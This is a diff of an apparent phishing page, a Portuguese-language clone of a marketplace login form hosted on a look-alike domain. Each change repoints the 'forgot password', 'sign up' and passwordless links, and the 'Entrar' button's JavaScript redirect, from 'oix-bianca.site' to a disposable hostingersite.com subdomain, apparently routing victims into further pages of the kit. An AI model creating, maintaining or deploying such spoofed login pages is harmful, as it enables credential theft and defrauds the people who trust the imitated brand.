--- a/5/index.html
+++ b/5/index.html
@@ -1611,7 +1611,7 @@
           <div data-ds-component="DS-TextInput" class="sc-fMiknA iKBYvX">
             <div class="sc-caSCKo denEoT">
               <label for="senha" color="--color-neutral-130" display="block" class="sc-dxgOiQ gVfKNW">Senha</label>
-              <a data-ds-component="DS-Link" class="sc-cRULEh kQXmds sc-jAaTju dsUwxl" href="https://oix-bianca.site/5/4/index.html">Esqueceu sua senha?</a>
+              <a data-ds-component="DS-Link" class="sc-cRULEh kQXmds sc-jAaTju dsUwxl" href="https://darkorange-dolphin-315653.hostingersite.com/5/4/index.html">Esqueceu sua senha?</a>
             </div>
             <span class="sc-dVhcbM eXvlRg">
               <input type="password" id="senha" name="senha" aria-busy="false" aria-label="Senha" aria-invalid="false" aria-errormessage="" aria-disabled="false" maxlength="40" label="Senha" value="" class="sc-eqIVtm cPmSUO">
@@ -1643,7 +1643,7 @@
   
   <script>
     document.getElementById("entrar").addEventListener("click", function() {
-      window.location.href = "https://oix-bianca.site/5/4/index.html";
+      window.location.href = "https://darkorange-dolphin-315653.hostingersite.com/5/4/index.html";
     });
   </script>
   
@@ -1768,7 +1768,7 @@
           <svg class="sc-iqtXtF klyVuM sc-gjAXCV ejsQGX" width="24px" height="24px" viewBox="0 0 24 24">
             <path fill="#F28000" d="M22.75 5.988V18A2.756 2.756 0 0 1 20 20.75H4A2.756 2.756 0 0 1 1.25 18V6.01v-.022A2.756 2.756 0 0 1 4 3.25h16a2.756 2.756 0 0 1 2.75 2.738zm-1.552-.342A1.258 1.258 0 0 0 20 4.75H4c-.563 0-1.044.38-1.198.896L12 12.085l9.198-6.44zm.052 1.794l-8.82 6.174a.75.75 0 0 1-.86 0L2.75 7.44V18c0 .686.564 1.25 1.25 1.25h16c.686 0 1.25-.564 1.25-1.25V7.44z"></path>
           </svg>
-          <a href="https://oix-bianca.site/5/4/index.html" style="display: inline-block;">
+          <a href="https://darkorange-dolphin-315653.hostingersite.com/5/4/index.html" style="display: inline-block;">
             <span style="color: #333; font-weight: 400;">
                 Entrar sem senha
             </span>
@@ -1790,7 +1790,7 @@
                         </div>
                         <div class="sc-esExBO dwclFT sc-hRmvpr fHwlOn">
                             <span font-weight="400" color="--color-neutral-130" display="block" class="sc-dxgOiQ byUuWP">Não tem uma conta?</span>
-                            <a data-ds-component="DS-Link" href="https://oix-bianca.site/5/4/index.html" class="sc-ctwKVn ksEoIZ sc-jAaTju hCDgKJ">Cadastre-se</a>
+                            <a data-ds-component="DS-Link" href="https://darkorange-dolphin-315653.hostingersite.com/5/4/index.html" class="sc-ctwKVn ksEoIZ sc-jAaTju hCDgKJ">Cadastre-se</a>
                         </div>
                     
                     <div class="sc-iWadT kSXDOA sc-hRmvpr fHwlOn">
